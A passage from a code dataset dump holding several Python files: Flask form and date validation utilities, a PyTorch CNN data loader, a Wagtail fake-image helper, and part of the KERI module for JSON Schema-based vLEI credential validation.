Reverte novamente a string para o formato de ordem original\n d = d[::-1]\n temp = list(d)\n if d[0] == '.': # Se o primeiro caracter e ponto vamos remover\n temp[0] = ''\n d = ''.join(temp)\n elif d[0] == '-' and d[1] == '.': # Se tem sinal negativo e o primeiro caracter e ponto vamos remover\n temp[1] = ''\n \n d = 'R$ '+''.join(temp)\n\n return d\n\n @staticmethod\n def desconverter(valor):\n return float(valor.replace('R$', '').replace('.', '').replace(',', '.')) \n # Recebe os grupos e as lojas e monta os chaveamentos corretos retornando uma lista\n @staticmethod\n def get_grupos_formatados(grupos, filiais):\n grupos_exatos = [\n '0101','0102','0201','0301','0302', \n '0401','0402','0501','0502','0601','0701','0702', \n '0801','0901','1001','1002','1101','1102','1201','1301', \n '1401','1501','1601','1602','1701','1801'\n ]\n grp = []\n for gr in grupos:\n for fi in filiais:\n gr_fi = '%02d%02d' % (int(gr), int(fi))\n if gr_fi in grupos_exatos:\n grp.append(gr_fi)\n return grp\n # Recebe um objeto request.form e retorna um objeto {de, ate, grupos, lojas} ou erro {erro:}\n @staticmethod\n def valida_form(form):\n ''' RECEBE UM OBJETO request.form e retorna um objeto com os campos ou um erro'''\n dados = form.form\n\n # veja se tem um campo dados e se consegue converter este json\n if len(dados) < 2 and not 'dados' in form.form.keys():\n return {'erro': 'ESPERADO UM ATRIBUTO DADOS QUE NAO EXISTE'}\n elif len(dados) < 2:\n try:\n dados = json.loads(dados['dados'])\n except json.decoder.JSONDecodeError:\n return {'erro': 'FALHA, DADOS ENVIADOS NÃO SÃO UM JSON'}\n # Agora é fazer a extração dos campos (se existirem ou retornar os erros)\n if not 'de' in dados.keys():\n return {'erro': 'FAVOR ENVIAR O CAMPO de'}\n if not 'ate' in dados.keys():\n return {'erro': 'FAVOR ENVIAR O CAMPO ate'}\n if not 'lojas' in dados.keys():\n return {'erro': 'FAVOR INFORMAR O CAMPO lojas'}\n if not 'grupos' in dados.keys():\n return {'erro': 'FAVOR INFORMAR OS GRUPOS'}\n # VEJA NA regex SE O CAMPO DE E ATE ATENDEM O PADRÃO DE DATA\n cp = re.compile('^[1-2][0-9]{3}-([0][0-9]|[1][0-2])-([0-2][0-9]|[3][0-1])$')\n if not cp.match(dados['de']):\n return {'erro': 'O CAMPO de NÃO ATENDE AO FORMATO AAAA-MM-DD'}\n if not cp.match(dados['ate']):\n return {'erro': 'O CAMPO ate NÃO ATENDE AO FORMATO AAAA-MM-DD'}\n # OK PASSOU ATÉ AQUI, AGORA É VER SE O CAMPO de é menor_igual ao campo ate\n deL = list(map(lambda x: int(x), dados['de'].split('-')))\n ateL = list(map(lambda x: int(x), dados['ate'].split('-'))) \n dts = list(map(lambda x: date(*x), [deL, ateL]))\n if dts[0] > dts[1]:\n return {'erro': 'A DATA de NÃO PODE SER MAIOR QUE A DATA ate'}\n del deL, ateL, dts, cp # limpando a casa\n # TODAS AS VALIDACOES FINALIZADAS\n return dados\n \n @staticmethod\n def valida_dados(form):\n ''' RECEBE UM OBJETO request.form e retorna um objeto com os campos ou um erro'''\n dados = form.form\n\n # veja se tem um campo dados e se consegue converter este json\n if not 'dados' in dados.keys():\n return {'erro': 'ESPERADO UM ATRIBUTO DADOS QUE NAO EXISTE'}\n try:\n dados = json.loads(dados['dados'])\n except json.decoder.JSONDecodeError:\n return {'erro': 'FALHA, DADOS ENVIADOS NÃO SÃO UM JSON'}\n return dados\n @staticmethod\n def validar_data(data):\n ''' Valida a data para ver se segue o padrao AAAA-MM-DD'''\n # VEJA NA regex SE O CAMPO DE E ATE ATENDEM O PADRÃO DE DATA\n cp = re.compile('^[1-2][0-9]{3}-([0][0-9]|[1][0-2])-([0-2][0-9]|[3][0-1])$')\n if not cp.match(data):\n return False\n return True\n @staticmethod\n def validar_de_menor_igual_que_ate(de, ate):\n ''' Valida para ver se a data de é menor igual que a data ate'''\n if not Utils.validar_data(de) or not Utils.validar_data(ate):\n return {'erro': 'A de ou ate não estão no formato AAAA-MM-DD'}\n # Veja se uma data é maior que a outra\n d1 = date(*list(map(lambda x: int(x), de.split('-'))))\n d2 = date(*list(map(lambda x: int(x), ate.split('-'))))\n if d1 > d2:\n return {'erro': 'A DATA de é maior que a data ate'}\n return {'sucesso': 'VALIDO'}\n @staticmethod\n def validar_arquivo(arq, tipos_aceitos: list):\n ''' VALIDA O ARQUIVO ENVIADO DE ACORDO COM SUA EXTENSÃO retornando True, se passou ou False caso contrario'''\n return '.' in arq and arq.rsplit('.', 1)[1].lower() in tipos_aceitos\n # funcao que gira a imagem\n @staticmethod\n def rotacionar_imagem(filepath, size = None, novo_nome = None):\n ''' Rotacionar a imagem a posicao correta '''\n image = Image.open(filepath)\n exf = None\n for orientation in ExifTags.TAGS.keys():\n if ExifTags.TAGS[orientation] == 'Orientation':\n exf = orientation\n break\n if not exf is None and '_getexif' in dir(image) and not image._getexif() is None:\n exif = dict(image._getexif().items())\n if not exf in exif.keys():\n pass\n elif exif[exf] == 3:\n image = image.transpose(Image.ROTATE_180)\n elif exif[exf] == 6:\n image = image.transpose(Image.ROTATE_270)\n elif exif[exf] == 8:\n image = image.transpose(Image.ROTATE_90)\n \n # Se tiver a tupla de dimensoes, defina e salve\n if not size is None:\n image = image.resize(size, Image.ANTIALIAS)\n # Se tiver o novo nome então salve neste novocaminho\n if not novo_nome is None:\n image.save(novo_nome)\n else:\n image.save(filepath, quality=100)\n image.close()\n return True\n \n\n\n\n\n\n \n\n\n\n\n", "sub_path": "flask/modelo.py", "file_name": "modelo.py", "file_ext": "py", "file_size_in_byte": 37543, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "flask.session", "line_number": 26, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 27, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 29, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 29, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 45, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 46, "usage_type": "name"}, {"api_name": "re.compile", "line_number": 50, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 60, "usage_type": "call"}, {"api_name": "pymysql.connect", "line_number": 119, "usage_type": "call"}, {"api_name": "pymssql.connect", "line_number": 121, "usage_type": "call"}, {"api_name": "pymysql.connect", "line_number": 236, "usage_type": "call"}, {"api_name": "pymssql.connect", "line_number": 238, "usage_type": "call"}, {"api_name": "pymongo.MongoClient", "line_number": 250, "usage_type": "call"}, {"api_name": "config.mongo_acesso", "line_number": 250, "usage_type": "attribute"}, {"api_name": "config.mongo_acesso", "line_number": 251, "usage_type": "attribute"}, {"api_name": "config.mongo_acesso", "line_number": 252, "usage_type": "attribute"}, {"api_name": "config.mongo_acesso", "line_number": 253, "usage_type": "attribute"}, {"api_name": "pymysql.connect", "line_number": 280, "usage_type": "call"}, {"api_name": "pymysql.connect", "line_number": 303, "usage_type": "call"}, {"api_name": "pymysql.connect", "line_number": 322, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 362, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 363, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 364, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 414, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 418, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 422, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 426, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 445, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 504, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 505, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 511, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 517, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 521, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 525, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 529, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 540, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 546, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 550, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 717, "usage_type": "call"}, {"api_name": "json.decoder", "line_number": 718, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 730, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 738, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 754, "usage_type": "call"}, {"api_name": "json.decoder", "line_number": 755, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 762, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 772, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 773, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 785, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 785, "usage_type": "name"}, {"api_name": "PIL.ExifTags.TAGS.keys", "line_number": 787, "usage_type": "call"}, {"api_name": "PIL.ExifTags.TAGS", "line_number": 787, "usage_type": "attribute"}, {"api_name": "PIL.ExifTags", "line_number": 787, "usage_type": "name"}, {"api_name": "PIL.ExifTags.TAGS", "line_number": 788, "usage_type": "attribute"}, {"api_name": "PIL.ExifTags", "line_number": 788, "usage_type": "name"}, {"api_name": "PIL.Image.ROTATE_180", "line_number": 796, "usage_type": "attribute"}, {"api_name": "PIL.Image", "line_number": 796, "usage_type": "name"}, {"api_name": "PIL.Image.ROTATE_270", "line_number": 798, "usage_type": "attribute"}, {"api_name": "PIL.Image", "line_number": 798, "usage_type": "name"}, {"api_name": "PIL.Image.ROTATE_90", "line_number": 800, "usage_type": "attribute"}, {"api_name": "PIL.Image", "line_number": 800, "usage_type": "name"}, {"api_name": "PIL.Image.ANTIALIAS", "line_number": 804, "usage_type": "attribute"}, {"api_name": "PIL.Image", "line_number": 804, "usage_type": "name"}]} +{"seq_id": "191852549", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Dec 2 21:51:05 2019\n\n@author: vaish\n\"\"\"\nimport torch\nimport os\nfrom skimage import io, transform\nimport numpy as np\nfrom torch.utils.data import Dataset, DataLoader\nfrom torchvision import transforms, utils\nimport torch.nn as nn\n\nclass Net(nn.Module):\n def __init__(self):\n super(Net, self).__init__()\n self.conv1 = nn.Conv2d(1, 32, 3, 1)\n self.conv2 = nn.Conv2d(32, 64, 3, 1)\n self.dropout1 = nn.Dropout2d(0.25)\n self.dropout2 = nn.Dropout2d(0.5)\n self.fc1 = nn.Linear(9216, 128)\n self.fc2 = nn.Linear(128, 10)\n \n def forward(self, x):\n x = self.conv1(x)\n x = F.relu(x)\n x = self.conv2(x)\n x = F.max_pool2d(x, 2)\n x = self.dropout1(x)\n x = torch.flatten(x, 1)\n x = self.fc1(x)\n x = F.relu(x)\n x = self.dropout2(x)\n x = self.fc2(x)\n output = F.log_softmax(x, dim=1)\n return output\n\nclass getData(Dataset):\n def __init__(self, data, transform=None):\n\n self.data = data[0]\n self.target = data[1]\n self.transform = transform\n print(self.data.shape)\n print(self.target.shape)\n def __len__(self):\n return len(self.target)\n\n def __getitem__(self, idx):\n if torch.is_tensor(idx):\n idx = idx.tolist()\n \n data = self.data[:,:,idx]\n target = self.target[idx]\n #print(data.shape)\n #print(target)\n sample = {'data': data, 'target': target}\n\n if self.transform:\n sample['data'] = self.transform(sample['data'])\n return sample\n\n\ndef CNN_1(data,trainSet):\n transformed_dataset = getData(data=(data['x'][:,:,data['set']==trainSet], data['y'][data['set']==trainSet]),\n transform=transforms.Compose([\n transforms.ToTensor()\n ]))\n \n dataloader = DataLoader(transformed_dataset, batch_size=64,\n shuffle=True)\n \n for i_batch, sample_batched in enumerate(dataloader):\n print(i_batch, sample_batched['data'].size(),\n sample_batched['target'].size())\n model = Net()", "sub_path": "code/untitled2.py", "file_name": "untitled2.py", "file_ext": "py", "file_size_in_byte": 2274, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "torch.nn.Module", "line_number": 15, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 15, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 18, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 18, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 19, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 19, "usage_type": "name"}, {"api_name": "torch.nn.Dropout2d", "line_number": 20, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 20, "usage_type": "name"}, {"api_name": "torch.nn.Dropout2d", "line_number": 21, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 21, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 22, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 22, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 23, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 23, "usage_type": "name"}, {"api_name": "torch.flatten", "line_number": 31, "usage_type": "call"}, {"api_name": "torch.utils.data.Dataset", "line_number": 39, "usage_type": "name"}, {"api_name": "skimage.transform", "line_number": 44, "usage_type": "name"}, {"api_name": "torch.is_tensor", "line_number": 51, "usage_type": "call"}, {"api_name": "torchvision.transforms.Compose", "line_number": 67, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 67, "usage_type": "name"}, {"api_name": "torchvision.transforms.ToTensor", "line_number": 68, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 68, "usage_type": "name"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 71, "usage_type": "call"}]} +{"seq_id": "584516343", "text": "import os\nimport logging\n\nfrom django.conf import settings\nfrom django.core.files import File\n\nfrom wagtail.images import get_image_model\n\nlogger = logging.getLogger(\"fake users:\")\nImage = get_image_model()\n\ndef create_dir_if_not_exists(directory):\n if not os.path.exists(directory):\n os.mkdir(directory)\n\ncreate_dir_if_not_exists(settings.MEDIA_ROOT)\ncreate_dir_if_not_exists(settings.DOWNLOADS_ROOT)\ncreate_dir_if_not_exists(settings.IMAGE_DOWNLOADS_DIR)\ncreate_dir_if_not_exists(settings.AVATAR_DOWNLOADS_DIR)\n\ndef create_wagtail_image(filename):\n filepath = os.path.join(settings.IMAGE_DOWNLOADS_DIR, filename)\n with open(filepath, \"rb\") as file:\n image_file = File(file)\n return Image.objects.create(file=image_file, title=filename)\n\n\ndef create_wagtail_images():\n images = []\n files = os.listdir(settings.IMAGE_DOWNLOADS_DIR)\n for file in files:\n images.append(create_wagtail_image(file))\n logger.info(\n f'Successfully created image: {file}'\n )\n return images\n", "sub_path": "backend/part-5/engineerx/images/modules/fakedata.py", "file_name": "fakedata.py", "file_ext": "py", "file_size_in_byte": 1040, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "logging.getLogger", "line_number": 9, "usage_type": "call"}, {"api_name": "wagtail.images.get_image_model", "line_number": 10, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 13, "usage_type": "call"}, {"api_name": "os.path", "line_number": 13, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 14, "usage_type": "call"}, {"api_name": "django.conf.settings.MEDIA_ROOT", "line_number": 16, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 16, "usage_type": "name"}, {"api_name": "django.conf.settings.DOWNLOADS_ROOT", "line_number": 17, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 17, "usage_type": "name"}, {"api_name": "django.conf.settings.IMAGE_DOWNLOADS_DIR", "line_number": 18, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 18, "usage_type": "name"}, {"api_name": "django.conf.settings.AVATAR_DOWNLOADS_DIR", "line_number": 19, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 19, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 22, "usage_type": "call"}, {"api_name": "os.path", "line_number": 22, "usage_type": "attribute"}, {"api_name": "django.conf.settings.IMAGE_DOWNLOADS_DIR", "line_number": 22, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 22, "usage_type": "name"}, {"api_name": "django.core.files.File", "line_number": 24, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 30, "usage_type": "call"}, {"api_name": "django.conf.settings.IMAGE_DOWNLOADS_DIR", "line_number": 30, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 30, "usage_type": "name"}]} +{"seq_id": "339633062", "text": "# -*- encoding: utf-8 -*-\n\"\"\"\nkeri.core.scheming module\n\nself-addressing and schema support\n\"\"\"\n\nimport json\n\nimport cbor2 as cbor\nimport jsonschema\nimport msgpack\n\nfrom . import coring\nfrom .coring import MtrDex, Serials, Saider, Ids\nfrom .. import help\nfrom ..kering import ValidationError, DeserializationError\n\nlogger = help.ogler.getLogger()\n\n\nclass CacheResolver:\n \"\"\"\n Sample jsonschema resolver for loading schema $ref references from a local hash.\n\n \"\"\"\n\n def __init__(self, cache=None):\n \"\"\"\n Create a jsonschema resolver that can be used for loading references to schema remotely.\n\n Parameters:\n cache (dict) is an optional pre-loaded cache of schema\n \"\"\"\n self.cache = cache if cache is not None else dict()\n\n def add(self, key, schema):\n \"\"\"\n Add schema to cache for resolution\n\n Parameters:\n key (str) URI to resolve to the schema\n schema (bytes) is bytes of the schema for the URI\n \"\"\"\n self.cache[key] = schema\n\n def resolve(self, uri):\n if uri not in self.cache:\n return None\n\n ref = self.cache[uri]\n return ref\n\n def handler(self, uri):\n \"\"\"\n Handler provided to jsonschema for cache resolution\n\n Parameters:\n uri (str) the URI to resolve\n \"\"\"\n ref = self.resolve(uri)\n if not ref:\n return None\n\n schemr = Schemer(raw=ref)\n return schemr.sed\n\n def resolver(self, scer=b''):\n \"\"\"\n Returns a jsonschema resolver for returning locally cached schema based on self-addressing\n identifier URIs.\n\n Parameters:\n scer (bytes) is the source document that is being processed for reference resolution\n\n \"\"\"\n return jsonschema.RefResolver(\"\", scer, handlers={\"did\": self.handler})\n\n\njsonSchemaCache = CacheResolver(cache={\n \"EFBMQwQ1fv_bEBpqrom0EHLytFZiP5tWAs5HUpaa-WUg\": b'{\"$id\":\"EFBMQwQ1fv_bEBpqrom0EHLytFZiP5tWAs5HUpaa-WUg\",'\n b'\"$schema\":\"http://json-schema.org/draft-07/schema#\",'\n b'\"title\":\"Legal Entity Official Organizational Role vLEI '\n b'Credential\",\"description\":\"A vLEI Role Credential issued by a '\n b'Qualified vLEI issuer to official representatives of a Legal '\n b'Entity\",\"properties\":{\"v\":{\"type\":\"string\"},'\n b'\"d\":{\"type\":\"string\"},\"i\":{\"type\":\"string\"},'\n b'\"s\":{\"description\":\"schema SAID\",\"type\":\"string\"},'\n b'\"a\":{\"description\":\"data block\",\"properties\":{\"d\":{'\n b'\"type\":\"string\"},\"i\":{\"type\":\"string\"},'\n b'\"dt\":{\"description\":\"issuance date time\",\"format\":\"date-time\",'\n b'\"type\":\"string\"},\"ri\":{\"description\":\"credential status '\n b'registry\",\"type\":\"string\"},\"LEI\":{\"type\":\"string\"},'\n b'\"personLegalName\":{\"type\":\"string\"},\"officialRole\":{'\n b'\"type\":\"string\"},\"t\":{\"contains\":{'\n b'\"const\":\"LegalEntityOfficialOrganizationalRolevLEICredential\"},'\n b'\"type\":\"array\"}},\"additionalProperties\":false,\"required\":[\"i\",'\n b'\"dt\",\"ri\",\"LEI\",\"personLegalName\",\"officialRole\",\"t\"],'\n b'\"type\":\"object\"},\"p\":{\"contains\":{\"type\":\"object\"},'\n b'\"description\":\"source block\",\"items\":{\"properties\":{'\n b'\"legalEntityvLEICredential\":{\"description\":\"chain to issuer '\n b'credential\",\"properties\":{\"d\":{\"type\":\"string\"},'\n b'\"i\":{\"type\":\"string\"}},\"additionalProperties\":false,'\n b'\"type\":\"object\"}},\"additionalProperties\":false,\"required\":['\n b'\"legalEntityvLEICredential\"],\"type\":\"object\"},\"maxItems\":1,'\n b'\"minItems\":1,\"type\":\"array\"}},\"additionalProperties\":false,'\n b'\"required\":[\"i\",\"s\",\"d\"],\"type\":\"object\"}',\n \"EC9rQ-xi_3cRrjANStL6tn6Kn4Z444r9rvTr_Vfi-750\": b'{\"$id\":\"EC9rQ-xi_3cRrjANStL6tn6Kn4Z444r9rvTr_Vfi-750\",'\n b'\"$schema\":\"http://json-schema.org/draft-07/schema#\",'\n b'\"title\":\"Legal Entity vLEI Credential\",\"description\":\"A vLEI '\n b'Credential issued by a Qualified vLEI issuer to a Legal '\n b'Entity\",\"properties\":{\"v\":{\"type\":\"string\"},'\n b'\"d\":{\"type\":\"string\"},\"i\":{\"type\":\"string\"},'\n b'\"s\":{\"description\":\"schema SAID\",\"type\":\"string\"},'\n b'\"a\":{\"description\":\"data block\",\"properties\":{\"d\":{'\n b'\"type\":\"string\"},\"i\":{\"type\":\"string\"},'\n b'\"dt\":{\"description\":\"issuance date time\",\"format\":\"date-time\",'\n b'\"type\":\"string\"},\"ri\":{\"description\":\"credential status '\n b'registry\",\"type\":\"string\"},\"LEI\":{\"type\":\"string\"},'\n b'\"t\":{\"contains\":{\"const\":\"LegalEntityvLEICredential\"},'\n b'\"type\":\"array\"}},\"additionalProperties\":false,\"required\":[\"i\",'\n b'\"dt\",\"ri\",\"LEI\",\"t\"],\"type\":\"object\"},\"p\":{\"contains\":{'\n b'\"type\":\"object\"},\"description\":\"source block\",'\n b'\"items\":{\"properties\":{\"qualifiedvLEIIssuervLEICredential\":{'\n b'\"description\":\"chain to issuer credential\",\"properties\":{\"d\":{'\n b'\"type\":\"string\"},\"i\":{\"type\":\"string\"}},'\n b'\"additionalProperties\":false,\"type\":\"object\"}},'\n b'\"additionalProperties\":false,\"required\":['\n b'\"qualifiedvLEIIssuervLEICredential\"],\"type\":\"object\"},'\n b'\"maxItems\":1,\"minItems\":1,\"type\":\"array\"},\"r\":{\"contains\":{'\n b'\"type\":\"object\"},\"description\":\"rules block\",\"type\":\"array\"}},'\n b'\"additionalProperties\":false,\"required\":[\"i\",\"s\",\"d\"],'\n b'\"type\":\"object\"}',\n \"EMNumLS-O9ScGskk8h4xHvoiAeQf-CDW6KU3LoDUiz3o\": b'{\"$id\":\"EMNumLS-O9ScGskk8h4xHvoiAeQf-CDW6KU3LoDUiz3o\",'\n b'\"$schema\":\"http://json-schema.org/draft-07/schema#\",'\n b'\"title\":\"Legal Entity Engagement Context Role vLEI Credential\",'\n b'\"description\":\"A vLEI Role Credential issued to representatives '\n b'of a Legal Entity in other than official roles but in '\n b'functional or other context of engagement\",\"properties\":{\"v\":{'\n b'\"type\":\"string\"},\"d\":{\"type\":\"string\"},\"i\":{\"type\":\"string\"},'\n b'\"s\":{\"description\":\"schema SAID\",\"type\":\"string\"},'\n b'\"a\":{\"description\":\"data block\",\"properties\":{\"d\":{'\n b'\"type\":\"string\"},\"i\":{\"type\":\"string\"},'\n b'\"dt\":{\"description\":\"issuance date time\",\"format\":\"date-time\",'\n b'\"type\":\"string\"},\"ri\":{\"description\":\"credential status '\n b'registry\",\"type\":\"string\"},\"LEI\":{\"type\":\"string\"},'\n b'\"personLegalName\":{\"type\":\"string\"},\"engagementContextRole\":{'\n b'\"type\":\"string\"},\"t\":{\"contains\":{'\n b'\"const\":\"LegalEntityEngagementContextRolevLEICredential\"},'\n b'\"type\":\"array\"}},\"additionalProperties\":false,\"required\":[\"i\",'\n b'\"dt\",\"ri\",\"LEI\",\"personLegalName\",\"engagementContextRole\",\"t\"],'\n b'\"type\":\"object\"},\"p\":{\"contains\":{\"type\":\"object\"},'\n b'\"description\":\"source block\",\"items\":{\"properties\":{'\n b'\"legalEntityvLEICredential\":{\"description\":\"chain to issuer '\n b'credential\",\"properties\":{\"d\":{\"type\":\"string\"},'\n b'\"i\":{\"type\":\"string\"}},\"additionalProperties\":false,'\n b'\"type\":\"object\"}},\"additionalProperties\":false,\"required\":['\n b'\"legalEntityvLEICredential\"],\"type\":\"object\"},\"maxItems\":1,'\n b'\"minItems\":1,\"type\":\"array\"}},\"additionalProperties\":false,'\n b'\"required\":[\"i\",\"s\",\"d\"],\"type\":\"object\"}',\n \"ES63gXI-FmM6yQ7ISVIH__hOEhyE6W6-Ev0cArldsxuc\": b'{\"$id\":\"ES63gXI-FmM6yQ7ISVIH__hOEhyE6W6-Ev0cArldsxuc\",'\n b'\"$schema\":\"http://json-schema.org/draft-07/schema#\",'\n b'\"title\":\"GLEIF vLEI Credential\",\"description\":\"The vLEI '\n b'Credential issued to GLEIF\",\"type\":\"object\",\"properties\":{\"v\":{'\n b'\"type\":\"string\"},\"d\":{\"type\":\"string\"},\"i\":{\"type\":\"string\"},'\n b'\"s\":{\"description\":\"schema SAID\",\"type\":\"string\"},'\n b'\"a\":{\"description\":\"data block\",\"properties\":{\"d\":{'\n b'\"type\":\"string\"},\"i\":{\"type\":\"string\"},'\n b'\"dt\":{\"description\":\"issuance date time\",\"format\":\"date-time\",'\n b'\"type\":\"string\"},\"ri\":{\"description\":\"credential status '\n b'registry\",\"type\":\"string\"},\"LEI\":{\"type\":\"string\"},'\n b'\"t\":{\"contains\":{\"const\":\"GLEIFvLEICredential\"},'\n b'\"type\":\"array\"}},\"additionalProperties\":false,\"required\":[\"d\",'\n b'\"dt\",\"ri\",\"LEI\",\"t\"],\"type\":\"object\"},\"p\":{\"maxItems\":0,'\n b'\"minItems\":0,\"type\":\"array\"}},\"additionalProperties\":false,'\n b'\"required\":[\"d\",\"i\"]}',\n \"E-_XCbf1LJ0v9CR7g-_gOknf5dpoZROgF7qG5T8mXCv8\": b'{\"$id\":\"E-_XCbf1LJ0v9CR7g-_gOknf5dpoZROgF7qG5T8mXCv8\",'\n b'\"$schema\":\"http://json-schema.org/draft-07/schema#\",'\n b'\"title\":\"Qualified vLEI Issuer Credential\",\"description\":\"A '\n b'vLEI Credential issued by GLEIF to Qualified vLEI Issuers which '\n b'allows the Qualified vLEI Issuers to issue, verify and revoke '\n b'Legal Entity vLEI Credentials and Legal Entity Official '\n b'Organizational Role vLEI Credentials\",\"properties\":{\"v\":{'\n b'\"type\":\"string\"},\"d\":{\"type\":\"string\"},\"i\":{\"type\":\"string\"},'\n b'\"s\":{\"description\":\"schema SAID\",\"type\":\"string\"},'\n b'\"a\":{\"description\":\"data block\",\"properties\":{\"d\":{'\n b'\"type\":\"string\"},\"i\":{\"type\":\"string\"},'\n b'\"dt\":{\"description\":\"issuance date time\",\"format\":\"date-time\",'\n b'\"type\":\"string\"},\"ri\":{\"description\":\"credential status '\n b'registry\",\"type\":\"string\"},\"LEI\":{\"type\":\"string\"},'\n b'\"gracePeriod\":{\"default\":90,\"type\":\"integer\"},\"t\":{\"contains\":{'\n b'\"const\":\"QualifiedvLEIIssuervLEICredential\"},\"type\":\"array\"}},'\n b'\"additionalProperties\":false,\"required\":[\"i\",\"dt\",\"ri\",\"LEI\",'\n b'\"t\"],\"type\":\"object\"},\"p\":{\"maxItems\":0,\"minItems\":0,'\n b'\"type\":\"array\"}},\"additionalProperties\":false,\"required\":[\"i\",'\n b'\"d\"],\"type\":\"object\"}',\n})\n\n\nclass JSONSchema:\n \"\"\"\n JSON Schema support class\n \"\"\"\n id_ = Ids.dollar # ID Field Label\n\n def __init__(self, resolver=CacheResolver()):\n self.resolver = resolver\n\n def resolve(self, uri):\n return self.resolver.resolve(uri)\n\n def load(self, raw=b'', kind=Serials.json):\n if kind == Serials.json:\n try:\n sed = json.loads(raw.decode(\"utf-8\"))\n except Exception as ex:\n raise DeserializationError(\"Error deserializing JSON: {} {}\"\n \"\".format(raw.decode(\"utf-8\"), ex))\n\n elif kind == Serials.mgpk:\n try:\n sed = msgpack.loads(raw)\n except Exception as ex:\n raise DeserializationError(\"Error deserializing MGPK: {} {}\"\n \"\".format(raw, ex))\n\n elif kind == Serials.cbor:\n try:\n sed = cbor.loads(raw)\n except Exception as ex:\n raise DeserializationError(\"Error deserializing CBOR: {} {}\"\n \"\".format(raw, ex))\n else:\n raise ValueError(\"Invalid serialization kind = {}\".format(kind))\n\n if self.id_ in sed:\n saider = Saider(qb64=sed[self.id_], label=self.id_)\n said = sed[self.id_]\n if not saider.verify(sed, prefixed=True, kind=kind, label=self.id_):\n raise ValidationError(\"invalid self-addressing identifier {} instead of {} in schema = {}\"\n \"\".format(said, saider.qb64, sed))\n else:\n raise ValidationError(\"missing ID field {} in schema = {}\"\n \"\".format(self.id_, sed))\n\n return sed, kind, saider\n\n @staticmethod\n def dump(sed, kind=Serials.json):\n raw = coring.dumps(sed, kind)\n return raw\n\n @staticmethod\n def detect(raw=b''):\n \"\"\"\n Returns True if content represents JSON Schema by checking\n for $schema; False otherwise\n \"\"\"\n\n try:\n raw.index(b'\"$schema\"')\n except ValueError:\n return False\n\n return True\n\n @staticmethod\n def verify_schema(schema):\n \"\"\"\n Returns True if the provided schema validates successfully\n as complaint Draft 7 JSON Schema False otherwise\n\n Parameters:\n schema (dict): is the JSON schema to verify\n \"\"\"\n try:\n jsonschema.Draft7Validator.check_schema(schema=schema)\n except jsonschema.exceptions.SchemaError:\n return False\n\n return True\n\n def verify_json(self, schema=b'', raw=b''):\n \"\"\"\n Returns True if the JSON passes validation against the\n provided complaint Draft 7 JSON Schema. Returns False\n if raw is not valid JSON, schema is not valid JSON Schema or\n the validation fails\n\n Parameters:\n schema (bytes): is the schema use for validation\n raw (bytes): is JSON to validate against the Schema\n \"\"\"\n try:\n d = json.loads(raw)\n jsonschema.validate(instance=d, schema=schema, resolver=self.resolver.resolver(scer=raw))\n except jsonschema.exceptions.ValidationError as ex:\n logger.error(f'jsonschema.exceptions.ValidationError {ex}')\n return False\n except jsonschema.exceptions.SchemaError as ex:\n logger.error(f'jsonschema.exceptions.SchemaError {ex}')\n return False\n except json.decoder.JSONDecodeError as 